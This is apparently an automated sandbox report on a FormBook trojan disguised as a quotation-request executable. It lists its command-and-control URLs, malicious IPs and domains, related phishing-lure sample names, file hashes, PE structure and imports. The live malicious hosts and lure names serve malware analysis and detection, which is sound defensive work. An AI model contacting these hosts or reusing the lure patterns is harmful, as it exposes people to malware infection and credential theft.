http://www.infohive.website/cnve/?UZkt_p=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVYx8sa0WL+tT4casLEwE0iohoJSZhnQSJqMleUJfhtsmPpk3GYPvE1sgo&Er=qt9d5V | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://codepen.io/uzcho_/pens/popular/?grid_type=list | comp.exe, 00000006.00000002.2561548663.00000000039BA000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.0000000002E6A000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://www.sunnyz.store | LcmEonpIrfS.exe, 00000007.00000002.2561468809.0000000004A6A000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://codepen.io/uzcho_/pen/eYdmdXw.css | comp.exe, 00000006.00000002.2561548663.00000000039BA000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.0000000002E6A000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.aapanel.com/new/download.html?invite_code=aapanele | comp.exe, 00000006.00000002.2561548663.0000000003696000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.0000000002B46000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
38.47.233.21 | qqa79.top | United States | 174 | COGENT-174US | true
172.67.137.47 | www.gk88top.top | United States | 13335 | CLOUDFLARENETUS | true
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | false
66.29.149.46 | www.infohive.website | United States | 19538 | ADVANTAGECOMUS | true
206.238.89.119 | www.127358.win | United States | 174 | COGENT-174US | false
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1574656
                                                    Start date and time:2024-12-13 13:05:22 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 9m 1s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Quotation Request-349849.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@6/5
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 90%
                                                    • Number of executed functions: 50
                                                    • Number of non-executed functions: 271
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: Quotation Request-349849.exe
Time | Type | Description
08:38:14 | API Interceptor | 1114527x Sleep call for process: comp.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
38.47.233.21 | Recibos.exe | Get hash | malicious | FormBook | Browse
• www.qqa79.top/dp98/
38.47.233.21 | CV_ Filipa Barbosa.exe | Get hash | malicious | FormBook | Browse
• www.qqa79.top/dp98/
217.70.184.50 | QUOTATON-37839993.exe | Get hash | malicious | FormBook | Browse
• www.sunnyz.store/ead0/
217.70.184.50 | PO# 81136575.exe | Get hash | malicious | DarkTortilla, FormBook | Browse
• www.akravchenko.dev/l1qb/
217.70.184.50 | Order No 24.exe | Get hash | malicious | FormBook | Browse
• www.4nk.education/gnvu/
217.70.184.50 | RFQ.exe | Get hash | malicious | FormBook | Browse
• www.4nk.education/gnvu/
217.70.184.50 | statement of accounts.exe | Get hash | malicious | FormBook | Browse
• www.4nk.education/gnvu/
217.70.184.50 | RFQ.exe | Get hash | malicious | FormBook | Browse
• www.astorg-group.info/vdvc/
217.70.184.50 | RFQ.exe | Get hash | malicious | FormBook | Browse
• www.astorg-group.info/vdvc/
217.70.184.50 | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse
• www.astorg-group.info/vdvc/
217.70.184.50 | SWIFT.exe | Get hash | malicious | FormBook | Browse
• www.4nk.education/gnvu/?1Do0qp=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FqHTgxtylpm53oBVxwqxSYDOalMgOBA==&yNNX=snRp
217.70.184.50 | #10302024.exe | Get hash | malicious | FormBook | Browse
• www.4nk.education/gnvu/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
webredir.vip.gandi.net | MA-DS-2024-03 URGENT.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
webredir.vip.gandi.net | RFQ _ Virtue 054451000085.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
webredir.vip.gandi.net | QUOTATON-37839993.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
webredir.vip.gandi.net | PO# 81136575.exe | Get hash | malicious | DarkTortilla, FormBook | Browse
• 217.70.184.50
webredir.vip.gandi.net | Order No 24.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
webredir.vip.gandi.net | statement of accounts.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
webredir.vip.gandi.net | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
www.infohive.website | QUOTATON-37839993.exe | Get hash | malicious | FormBook | Browse
• 66.29.149.46
www.127358.win | QUOTATON-37839993.exe | Get hash | malicious | FormBook | Browse
• 206.238.89.119
www.127358.win | lgkWBwqY15.exe | Get hash | malicious | FormBook | Browse
• 206.238.89.119
www.127358.win | Order MEI PO IM202411484.exe | Get hash | malicious | FormBook | Browse
• 206.238.89.119
www.127358.win | IETC-24017.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
• 206.238.89.119
www.127358.win | need quotations.exe | Get hash | malicious | FormBook | Browse
• 206.238.89.119
www.gk88top.top | QUOTATON-37839993.exe | Get hash | malicious | FormBook | Browse
• 104.21.7.187
www.gk88top.top | purchase order.exe | Get hash | malicious | FormBook | Browse
• 104.21.7.187
www.gk88top.top | attached invoice.exe | Get hash | malicious | FormBook | Browse
• 104.21.7.187
www.gk88top.top | attached order.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
• 104.21.7.187
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ADVANTAGECOMUS | https://shinybnb.ch/wp-includes/ms_doc.html | Get hash | malicious | HTMLPhisher | Browse
• 66.29.132.149
ADVANTAGECOMUS | RFQ3978 39793980.pdf.exe | Get hash | malicious | FormBook | Browse
• 66.29.149.46
ADVANTAGECOMUS | prtprr.exe | Get hash | malicious | FormBook | Browse
• 66.29.133.226
ADVANTAGECOMUS | DHL 40312052024.exe | Get hash | malicious | FormBook | Browse
• 66.29.149.46
ADVANTAGECOMUS | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse
• 66.29.149.46
ADVANTAGECOMUS | QUOTATON-37839993.exe | Get hash | malicious | FormBook | Browse
• 66.29.149.46
ADVANTAGECOMUS | purchase order.exe | Get hash | malicious | FormBook | Browse
• 66.29.149.46
ADVANTAGECOMUS | 965600.invoice.exe | Get hash | malicious | FormBook | Browse
• 66.29.153.238
ADVANTAGECOMUS | rPaymentAdviceNote_pdf.exe | Get hash | malicious | FormBook | Browse
• 66.29.137.10
ADVANTAGECOMUS | Invoice 10493.exe | Get hash | malicious | FormBook | Browse
• 66.29.132.194
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | MA-DS-2024-03 URGENT.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | RFQ _ Virtue 054451000085.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | QUOTATON-37839993.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | PO# 81136575.exe | Get hash | malicious | DarkTortilla, FormBook | Browse
• 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | Order No 24.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | RFQ.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | statement of accounts.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | RFQ.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | RFQ.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse
• 217.70.184.50
CLOUDFLARENETUS | http://home45insurance.blogspot.com | Get hash | malicious | Unknown | Browse
• 104.20.2.69
CLOUDFLARENETUS | http://home45insurance.blogspot.com | Get hash | malicious | Unknown | Browse
• 104.20.3.69
CLOUDFLARENETUS | duschno.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse
• 172.67.74.152
CLOUDFLARENETUS | Bloxflip Predictor.exe | Get hash | malicious | Njrat | Browse
• 162.159.137.232
CLOUDFLARENETUS | file.exe | Get hash | malicious | Amadey, LummaC Stealer, Xmrig | Browse
• 172.67.139.78
CLOUDFLARENETUS | file.exe | Get hash | malicious | Unknown | Browse
• 172.67.192.146
CLOUDFLARENETUS | https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com | Get hash | malicious | HTMLPhisher | Browse
• 104.17.25.14
CLOUDFLARENETUS | https://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156 | Get hash | malicious | TechSupportScam | Browse
• 1.1.1.1
CLOUDFLARENETUS | https://idw.soundestlink.com/ce/c/675b7a96903a5335b119c33f/675b7ae33d33226215120f66/675b7afd057112d43b49094d?signature=7e9e7eead1b3f32bbe3709a667795cd47f753f0f46ed5e056831680ea81aa102 | Get hash | malicious | Unknown | Browse
• 172.64.145.78
CLOUDFLARENETUS | https://opof.utackhepr.com/WE76L1u/ | Get hash | malicious | Unknown | Browse
• 104.18.95.41
COGENT-174US | RFQ.pdf.exe | Get hash | malicious | XWorm | Browse
• 154.39.0.138
COGENT-174US | new1.exe | Get hash | malicious | RedLine | Browse
• 38.180.72.54
COGENT-174US | kiyan.exe | Get hash | malicious | RedLine | Browse
• 38.180.109.140
COGENT-174US | sparc.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 149.29.31.81
COGENT-174US | powerpc.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 143.244.62.231
COGENT-174US | arm7.nn-20241213-0355.elf | Get hash | malicious | Mirai, Okiru | Browse
• 38.186.192.208
COGENT-174US | mipsel.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 38.7.99.150
COGENT-174US | arm.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 149.41.67.4
COGENT-174US | mips.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 149.120.173.223
COGENT-174US | b3astmode.mpsl.elf | Get hash | malicious | Mirai | Browse
• 38.11.54.120
                                                    No context
                                                    No context
                                                    Process:C:\Windows\SysWOW64\comp.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:modified
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1215420383712111
                                                    Encrypted:false
                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Process:C:\Users\user\Desktop\Quotation Request-349849.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):288256
                                                    Entropy (8bit):7.993744669473948
                                                    Encrypted:true
                                                    SSDEEP:6144:/T3i3HD9mVW4ctoXWAxWV/KM3sqiL1n03PPRuraFmoo3SoYfHClUvHgIAoaN:/sZmwLiWMW9KoyLIRuryw3SoYfHClCs
                                                    MD5:988550BFE69A1457D6F461B0F711EE03
                                                    SHA1:E5EFF3207BE78E56A5C8C8E3F97956559E3F7E5E
                                                    SHA-256:2546D8EF5C8B38666FFC7B1D94E3A3308BB3DE3074AEACF51B9F42D8DF1B1FB3
                                                    SHA-512:D5CAA1E718653BA5076F144ECDBC04014D4ACEA30C2D23AC4F188791914F49C25116C53B8B674992E39B89CD7F33CBCD5598B65024E28C5C3ECEBA62D3D2F6EE
                                                    Malicious:false
                                                    Reputation:low
                                                    Process:C:\Users\user\Desktop\Quotation Request-349849.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):288256
                                                    Entropy (8bit):7.993744669473948
                                                    Encrypted:true
                                                    SSDEEP:6144:/T3i3HD9mVW4ctoXWAxWV/KM3sqiL1n03PPRuraFmoo3SoYfHClUvHgIAoaN:/sZmwLiWMW9KoyLIRuryw3SoYfHClCs
                                                    MD5:988550BFE69A1457D6F461B0F711EE03
                                                    SHA1:E5EFF3207BE78E56A5C8C8E3F97956559E3F7E5E
                                                    SHA-256:2546D8EF5C8B38666FFC7B1D94E3A3308BB3DE3074AEACF51B9F42D8DF1B1FB3
                                                    SHA-512:D5CAA1E718653BA5076F144ECDBC04014D4ACEA30C2D23AC4F188791914F49C25116C53B8B674992E39B89CD7F33CBCD5598B65024E28C5C3ECEBA62D3D2F6EE
                                                    Malicious:false
                                                    Reputation:low
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.182665717884667
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Quotation Request-349849.exe
                                                    File size:1'201'664 bytes
                                                    MD5:060d1fa22ca3227bef173104f09a853c
                                                    SHA1:d0f22b602ce5640f9594a45008751f027523e1f9
                                                    SHA256:89d993d7acbce99b1378c80d9e0ee143141eb06dd1bd926dd23f941f0ca704ad
                                                    SHA512:7a36e9bce866f0dbac0154422bee73fcb196ab31fe040d4ae1f2327a25d625788a72e735a14fc5ffa7e4bc81d9cfe22a037d9798a5e1c65f83cb93305ffc311f
                                                    SSDEEP:24576:iu6J33O0c+JY5UZ+XC0kGso6Fa+nW7yHRF5bzTgS8gRZ8GWY:Eu0c++OCvkGs9Fa+nZHtvJ8gRWY
                                                    TLSH:3245CF2273DDC360CB669173BF69B7016EBF3C214630B95B2F980D7DA950162262D7A3
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                    Icon Hash:aaf3e3e3938382a0
                                                    Entrypoint:0x427dcd
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x675ACC22 [Thu Dec 12 11:42:26 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:1
                                                    File Version Major:5
                                                    File Version Minor:1
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:1
                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                    Instruction
                                                    call 00007FBF48DD2C0Ah
                                                    jmp 00007FBF48DC59D4h
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    push edi
                                                    push esi
                                                    mov esi, dword ptr [esp+10h]
                                                    mov ecx, dword ptr [esp+14h]
                                                    mov edi, dword ptr [esp+0Ch]
                                                    mov eax, ecx
                                                    mov edx, ecx
                                                    add eax, esi
                                                    cmp edi, esi
                                                    jbe 00007FBF48DC5B5Ah
                                                    cmp edi, eax
                                                    jc 00007FBF48DC5EBEh
                                                    bt dword ptr [004C31FCh], 01h
                                                    jnc 00007FBF48DC5B59h
                                                    rep movsb
                                                    jmp 00007FBF48DC5E6Ch
                                                    cmp ecx, 00000080h
                                                    jc 00007FBF48DC5D24h
                                                    mov eax, edi
                                                    xor eax, esi
                                                    test eax, 0000000Fh
                                                    jne 00007FBF48DC5B60h
                                                    bt dword ptr [004BE324h], 01h
                                                    jc 00007FBF48DC6030h
                                                    bt dword ptr [004C31FCh], 00000000h
                                                    jnc 00007FBF48DC5CFDh
                                                    test edi, 00000003h
                                                    jne 00007FBF48DC5D0Eh
                                                    test esi, 00000003h
                                                    jne 00007FBF48DC5CEDh
                                                    bt edi, 02h
                                                    jnc 00007FBF48DC5B5Fh
                                                    mov eax, dword ptr [esi]
                                                    sub ecx, 04h
                                                    lea esi, dword ptr [esi+04h]
                                                    mov dword ptr [edi], eax
                                                    lea edi, dword ptr [edi+04h]
                                                    bt edi, 03h
                                                    jnc 00007FBF48DC5B63h
                                                    movq xmm1, qword ptr [esi]
                                                    sub ecx, 08h
                                                    lea esi, dword ptr [esi+08h]
                                                    movq qword ptr [edi], xmm1
                                                    lea edi, dword ptr [edi+08h]
                                                    test esi, 00000007h
                                                    je 00007FBF48DC5BB5h
                                                    bt esi, 03h
                                                    jnc 00007FBF48DC5C08h
                                                    Programming Language:
                                                    • [ASM] VS2013 build 21005
                                                    • [ C ] VS2013 build 21005
                                                    • [C++] VS2013 build 21005
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [ASM] VS2013 UPD4 build 31101
                                                    • [RES] VS2013 build 21005
                                                    • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5cc08 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x124000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5cc08 | 0x5ce00 | af7e6d25623e32330946ebf9848f16b7 | False | 0.9285492723755047 | data | 7.897393944283926 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x124000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x53ecf | data | | | 1.0003229006367833
RT_GROUP_ICON | 0x123688 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x123700 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x123714 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x123728 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x12373c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x123818 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, 